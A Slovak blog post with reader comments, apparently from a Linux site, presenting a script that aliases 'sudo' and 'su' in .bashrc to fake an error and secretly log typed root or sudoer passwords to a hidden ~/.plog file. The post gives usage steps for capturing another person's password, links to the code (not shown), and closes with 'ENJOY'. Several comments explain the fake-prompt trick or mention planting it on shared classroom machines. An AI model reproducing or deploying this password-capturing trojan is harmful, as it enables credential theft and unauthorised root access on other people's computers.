Získajte heslo ROOT

Narazil som na skript, ktorý zmení .bashrc a vytvorí alias pre „sudo“ a „su“. najskôr bez vytvorenia zálohy súboru, aby ste ho mohli neskôr obnoviť.

Čo robí, je to, že pri použití súborov „sudo“ alebo „su“ odošle chybové hlásenie a zaznamená heslo do denníka s názvom „.plog“, ktorý je doma.

Spôsob použitia

  1. Uložte skript
  2. Dajte mu povolenie na vykonávanie.
  3. Spustite to v termináli
  4. Zatvorte terminál
  5. Počkaj.
  6. Potom skontrolujte súbor .plog. A tam musí byť heslo root alebo nejakého používateľa, ktorý je v sudoers.

http://paste.desdelinux.net/4691

UŽITE SI TO.


Zanechajte svoj komentár

Vaša e-mailová adresa nebude zverejnená. Povinné položky sú označené *

*

*

  1. Zodpovedný za údaje: Miguel Ángel Gatón
  2. Účel údajov: Kontrolný SPAM, správa komentárov.
  3. Legitimácia: Váš súhlas
  4. Oznamovanie údajov: Údaje nebudú poskytnuté tretím stranám, iba ak to vyplýva zo zákona.
  5. Ukladanie dát: Databáza hostená spoločnosťou Occentus Networks (EU)
  6. Práva: Svoje údaje môžete kedykoľvek obmedziť, obnoviť a vymazať.

  1.   v3on dijo

    pre týchto ľudí je, že by sa nemalo zanedbávať fyzické zabezpečenie nášho tímu

    1.    truko22 dijo

      Máte pravdu, ak je počítač na chvíľu požičaný, musíte skontrolovať aliasy 😀

  2.   Lolo dijo

    Nevinná otázka:

    Ako skript zmení súbor .bashrc používateľa, ktorý nie je sudoer?

  3.   Blaire pascal dijo

    Oo veľmi sa mi to páči. Testovanie.

  4.   pacoeloyo dijo

    Takže bezpečnosť a šifrovanie, ktoré používame v GNU / Linux, sú bezcenné? Myslím si, že to tak nie je, ktokoľvek to skúsi, mal by sa vyjadriť k výsledkom. Pretože som použil tento systém, dočítal som sa, že úrovne šifrovania v systéme Linux sú veľmi vysoké. Heslá sú šifrované pomocou jednosmerných algoritmov redukcie kryptografie a teraz sa ukazuje, že pri jednoduchom skripte sa šifrovanie preskočí. Je mi to ľúto, ale neverím tomu.

    1.    @Jlcmux dijo

      Ak to funguje, pozri. Stane sa to, že skript vytvorí alias v .bashrc pomocou sudo a su. A keď napíšete su alebo sudo. Najskôr si prečíta alias. nie príkaz ako taký. takže keď napíšete heslo, vloží ho do normálneho textového súboru. a potom vymaže alias a umožní vám používať sudo alebo su common. Myslím, že je to ako piškot. Nie je to tak, že obchádza šifrovanie. je to falošné prihlásenie.

      1.    pacoeloyo dijo

        Ok teraz, ak tomu rozumiem, už ma prekvapilo, že som preskočil túto ochranu na torreru .. Ďakujem za objasnenie.

        1.    kike dijo

          Iste, ale zostáva to najťažšie, dostať skript vkradnutý na počítač obete, spustiť ho a potom zbierať súbor na diaľku alebo odoslať na e-mail. Tam bude musieť každý uplatniť svoju fantáziu!

    2.    EVER dijo

      Myslím, že ste to prehnali s mnohými pacoeloyo. Jedná sa o jednoduchý trójsky kôň, ktorý vyžaduje, aby používateľ obišiel rôzne bezpečnostné opatrenia a lokálnu prítomnosť útočníka. To existuje v akomkoľvek OS.
      Pokiaľ ide o skript ... ak sa nemýlim, väčšina súčasných SUDO sa autentizuje pomocou hesla používateľa, nie podľa hesla root. Heslo, ktoré by sa malo získať, je teda heslo používateľa (uvedené v sudoers).
      pozdravy

      1.    @Jlcmux dijo

        je s sudo alebo su. Tiež, ak môže používateľ používať sudo, je to preto, že je v sudoers a má rovnaké privilégiá ako root .. alebo nie?

        1.    EVER dijo

          nie vždy, záleží to na konfigurácii sudoers. Najbežnejšie je, že áno, máte plný prístup.
          Jedná sa o to, že akcie vykonané pomocou sudo sa zvyčajne zaznamenávajú

      2.    diazepam dijo

        jednoduché vyvolanie „su“ umožní prístup k účtu root.

  5.   ps dijo

    To je veľmi nebezpečné, ak v sieťach zdieľaných tried alebo dielní používate dobré heslá. Môžu to hrať za vás. No mohli to hrať ...

    Nie je užitočné objavovať heslá cudzincov, ale myslím si, že známych stačí.

    A pamätajte, že väčšina duplikuje svoje heslá alebo používa bežné vzory. Nikdy ich nepodceňujte. Ak ste samozrejme veľmi bastardi ...

  6.   Germaine dijo

    No, nehrotím sa ... Nemám čo skrývať, ani otázky týkajúce sa záverečnej skúšky ... a ak potrebujem heslo, opýtam sa ho ... a svoje súbory mám na externom pevnom disku. .. so zálohou na mojom notebooku, ktorá zostáva na House.
    Musíme hľadať jednoduchosť a praktickosť, dnes som nažive, zajtra neviem ... Žijem dnes, zvyšok sú nadčasy.

  7.   ferchmetal dijo

    Budem to mať na pamäti, ďakujem.

  8.   lynx dijo

    Zaujímavé!

  9.   Lolo dijo

    Ako sa tento skript skopíruje do súboru .bashrc používateľa sudoer?

    Ak máte účet v počítači, nemôžete vstúpiť do domu iného používateľa, pokiaľ na to nemáte povolenie. Stále pochybujem, že môžete upraviť .bashrc obete.

    Veľmi pochybujem, že to bude fungovať, pokiaľ nebude užívateľ sudoeru mimoriadne neopatrný.

  10.   lex aleksandre dijo

    S týmto počasím musíme byť veľmi opatrní!

  11.   Marcos dijo

    Jedna otázka, ak nemám heslo root, ako môžem dať povolenie na spustenie súboru? Alebo funguje normálny užívateľ?

    1.    @Jlcmux dijo

      Samozrejme. Povolenia na vykonávanie nie sú vyhradené pre root.

      1.    Alberto Aru dijo

        POMOC!
        po vyskúšaní som odstránil .sudo_sd a nemôžem nájsť nič v google (alebo iných vyhľadávačoch)

        1.    Alberto Aru dijo

          Vymazal som .plog a automaticky sa vymazal .sudo_sd a nemôžem sa prihlásiť ako root

          1.    Alberto Aru dijo

            OPRAVENÉ KOMENTÁROM K ALIASOVI

  12.   Card dijo

    Ak to funguje na MAC, idem trollovať do Apple obchodu ... hej! ale len trochu, nie v teroristickom pláne 😉

  13.   Atheyus dijo

    Zaujímavý vstup

    Pochybnosť

    A ak použijem gksu alebo ekvivalent v kde

    Zachytáva tiež heslo

    pozdravy

  14.   životnosť prilby dijo

    Vykonaniu tohto skriptu sa dá vyhnúť udelením povolenia iba na čítanie súboru .bashrc

  15.   Blažek dijo

    Testované, funguje to, aunk má svoje obmedzenia. V systéme Linux sa vždy dozviete nové veci.

  16.   Alberto Aru dijo

    Ako môžem vrátiť vykonané zmeny späť? Vymazal som .plog a nedovolí mi používať sudo:
    bash: /home/alberto/.sudo_sd: Súbor alebo adresár neexistuje

    1.    Alberto Aru dijo

      OPRAVENÉ KOMENTÁROM K ALIASOVI